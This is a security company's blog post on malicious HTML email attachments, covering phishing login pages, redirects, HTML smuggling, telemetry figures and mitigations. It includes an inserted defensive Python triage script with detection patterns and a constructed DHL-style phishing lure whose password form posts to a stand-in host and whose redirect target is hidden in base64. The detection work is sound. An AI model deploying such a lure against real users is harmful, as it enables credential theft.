Chris Swagler | May 8th, 2023

Researchers are warning that threat operators are increasingly using malicious HTML files in their cyberattacks, with malicious files now accounting for roughly half of all HTML attachments delivered through email. The prevalence of malicious HTML has more than doubled since last year, and the increase does not appear to be the product of mass campaigns that deliver the same attachment to large numbers of recipients. The fact that a tactic or tool has been around for a while does not make it any less potent; threat operators keep using malicious HTML because it works. Putting adequate security in place is as vital now as it has always been.

Why Is HTML a Threat Operator Favorite?

HTML, the standard markup language for web content, has many legitimate uses in email. Company users frequently receive reports generated by applications and tools and delivered as HTML attachments, so users are not suspicious when they see one, and email security gateways cannot simply block the file type outright. HTML is also flexible in the kinds of attack it can carry. Credential phishing is a frequent use case: threat operators craft HTML attachments that, when opened, impersonate the login page of a well-known service. Because HTML can be dynamic, the attachment can also use JavaScript to redirect the user to a phishing site. Imagine a user receiving what looks like an automated DHL parcel notification, opening the attached HTML file, and seeing a copy of the DHL login page.

In other cases, the HTML attachment contains links and lures that try to persuade the user to download a secondary file carrying the malware payload. The advantage for threat operators is that an HTML lure has a considerably higher chance of bypassing the email security gateway than a malware payload attached directly, whether inside a zip archive or as a separate file type. Because the lure is in front of the user, if they agree to download the file to their computer, detection is left to the endpoint protection solution; the threat operator has already bypassed the first line of defense. Researchers have also seen cases in which the HTML file itself carries the complete malicious payload, including entire scripts and executables, a technique commonly known as HTML smuggling. This approach has become more widely used than attacks that rely on externally hosted JavaScript files.
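As an added example (not code from this page or from SpearTip), the following Python script shows what a gateway-side static check for the attacks just described could look like: it pulls HTML attachments out of a raw .eml even when they are mislabelled, decodes base64-hidden redirect targets, flags JavaScript redirects and decoder calls, password forms posting to untrusted hosts, and forced downloads of embedded binaries, and scores each file. The sample message, the DHL-style lure, the hostnames and the indicator weights are all constructed for the illustration.

```python
# Added example (not SpearTip's tooling): static triage of HTML attachments for the tricks described above.
import base64, email, re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

REDIRECT_RE = re.compile(r"\b(?:(?:window|document|top|self)\.)?location(?:\.href|\.replace|\.assign)?\s*[=(]")
DECODER_RE = re.compile(r"\b(?:atob|unescape|eval|String\.fromCharCode|decodeURIComponent)\s*\(")
ATOB_LITERAL_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

class _Collector(HTMLParser):  # collects inline scripts, credential forms and forced downloads
    def __init__(self):
        super().__init__()
        self.scripts, self.forms, self.downloads = [], [], []
        self._script, self._form = None, None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # valueless attributes parse as None
        if tag == "script":
            self._script = []
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "password": False}
        elif tag == "input" and self._form and a.get("type", "").lower() == "password":
            self._form["password"] = True
        elif tag == "a" and "download" in a:  # <a download> forces a file save
            self.downloads.append(a.get("href", ""))

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.scripts.append("".join(self._script))
            self._script = None
        elif tag == "form" and self._form:
            self.forms.append(self._form)
            self._form = None

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

def analyze_html(html, trusted_hosts=()):
    """Score one attachment; returns the score, indicator names and every URL it would reach."""
    c = _Collector()
    c.feed(html)
    c.close()
    js, hits, urls = "\n".join(c.scripts), [], []
    for m in ATOB_LITERAL_RE.finditer(js):  # decode atob("...") so hidden redirect targets can be inspected
        try:
            urls += URL_RE.findall(base64.b64decode(re.sub(r"\s", "", m.group(1))).decode("utf-8", "replace"))
        except ValueError:  # not valid base64; skip the literal
            pass
    if c.scripts:
        hits.append(("inline_script", 1))
    if REDIRECT_RE.search(js):
        hits.append(("client_side_redirect", 3))
    if DECODER_RE.search(js):
        hits.append(("obfuscated_payload", 3))
    for f in c.forms:  # password form posting to a host we do not trust
        host = urlparse(f["action"]).hostname or ""
        if f["password"] and host not in trusted_hosts:
            hits.append(("credential_form_to_" + (host or "relative"), 4))
            urls.append(f["action"])
    if any(h.lower().startswith("data:application") for h in c.downloads):
        hits.append(("embedded_binary_download", 5))  # HTML smuggling: the payload is inside the file
    return {"score": sum(w for _, w in hits), "indicators": [n for n, _ in hits], "urls": urls}

def triage_eml(raw, trusted_hosts=(), threshold=5):
    """Find every HTML attachment in a raw .eml (even if mislabelled) and score it."""
    results = []
    for part in email.message_from_bytes(raw, policy=policy.default).walk():
        name = part.get_filename() or ""
        html_named = name.lower().endswith((".htm", ".html"))
        if not (html_named or (part.get_content_type() == "text/html" and part.is_attachment())):
            continue
        r = analyze_html((part.get_payload(decode=True) or b"").decode("utf-8", "replace"), trusted_hosts)
        r["filename"] = name
        r["verdict"] = "malicious" if r["score"] >= threshold else ("suspicious" if r["score"] else "clean")
        results.append(r)
    return results

# Constructed samples (not real campaign artefacts): a DHL-style lure with a fake login form that
# then redirects to a base64-hidden URL, beside an ordinary tool-generated report.
HIDDEN_TARGET = "http://dhl-verify.example/login"
LURE_HTML = f"""<html><body><h2>DHL: sign in to release your parcel</h2>
<form method="post" action="https://dhl-secure-login.example/verify.php">
<input name="email" type="text"><input name="pass" type="password"><button>Sign in</button></form>
<script>window.location.replace(atob("{base64.b64encode(HIDDEN_TARGET.encode()).decode()}"));</script>
</body></html>"""
REPORT_HTML = "<html><body><h1>Weekly backup report</h1><table><tr><td>fileserver</td><td>OK</td></tr></table></body></html>"

def build_sample_eml():
    """Constructed message carrying both attachments, as a mail gateway would receive it."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "notify@parcel-update.example", "user@corp.example", "Parcel on hold"
    msg.set_content("Open the attached notice to release your parcel.")
    msg.add_attachment(LURE_HTML, subtype="html", filename="DHL_Notice.html")
    msg.add_attachment(REPORT_HTML, subtype="html", filename="weekly_report.html")
    return msg.as_bytes()
```

Calling triage_eml(build_sample_eml()) returns one result per attachment: the lure scores 11 with the verdict "malicious", and both URLs it would contact, including the one hidden inside atob(), are surfaced for reputation checks before any verdict is made, while the report scores 0. The weights are deliberately coarse; the point is that every redirect target is extracted and inspected, which is what "inspecting all redirects" means in practice. A real gateway would also unpack zip archives and detonate the file in a sandbox, because obfuscation such as String.fromCharCode chains or split string literals defeats static pattern matching of this kind.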

Malicious HTML Attachments Are Becoming Common

One cybersecurity company's analysis of its own telemetry found that in May 2022, 21% of the HTML attachments scanned by its products were malicious. That was already the highest malicious-to-clean ratio of any file type delivered by email, and it has worsened since, reaching 45.7% in March of this year: a user who receives an HTML attachment now has roughly a one-in-two chance that it is malicious. To make sure a few massive campaigns were not skewing the numbers, the researchers also examined how many of the malicious files were unique, choosing two periods between January and March with considerable spikes in malicious HTML that implied large attacks. On March 7, the company's products scanned 672,145 malicious HTML artifacts, of which 181,176 (just over one-quarter) were unique, so a substantial share of the detections came from distinct attacks rather than one mass mailing. The second spike, on March 23, was much worse: 85% of the 475,938 malicious HTML detections were unique. Protection against HTML-based attacks therefore has to scan emails that carry HTML attachments, inspect every redirect the file would perform, and assess the email's content for malicious intent.

Mitigating Malicious HTML Attachments

Email security solutions should examine the full context of an email rather than just the attachment's contents. It is also critical to train employees to recognize and report malicious HTML attachments and to be skeptical of such attachments from unknown sources. Companies need incident response tools and processes that allow an attachment to be removed from every mailbox it may have reached once the security team identifies it as malicious. Two-factor authentication combined with zero-trust access controls that evaluate not just credentials but also the user's device, location, time zone, and history can limit the damage even when users fall for phishing and have their credentials stolen. Accounts also need post-login monitoring so that the security team is alerted when suspicious behavior is identified.

With more threat operators relying on malicious HTML files in their cyberattacks and phishing campaigns, it’s essential for companies to stay ahead of the current threat landscape and train their employees to detect suspicious HTML attachments. At SpearTip, our experts offer phishing awareness training to partners to enhance skills related to defending against these threats. The training tests the discernment of companies’ teams, educates employees regarding common phishing tactics and indicators, and identifies related security gaps in their environment. Our team creates phishing emails and social engineering simulations like those threat actors use and sends them throughout the organization. Throughout the training, SpearTip experts provide insight and feedback to improve the cyber defenses of companies’ teams, leading to a profound decrease in the likelihood of being victimized by phishing or social engineering scams. After the training, our team provides precise and thorough strategies about how to harden their environment and implement ongoing awareness training.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.
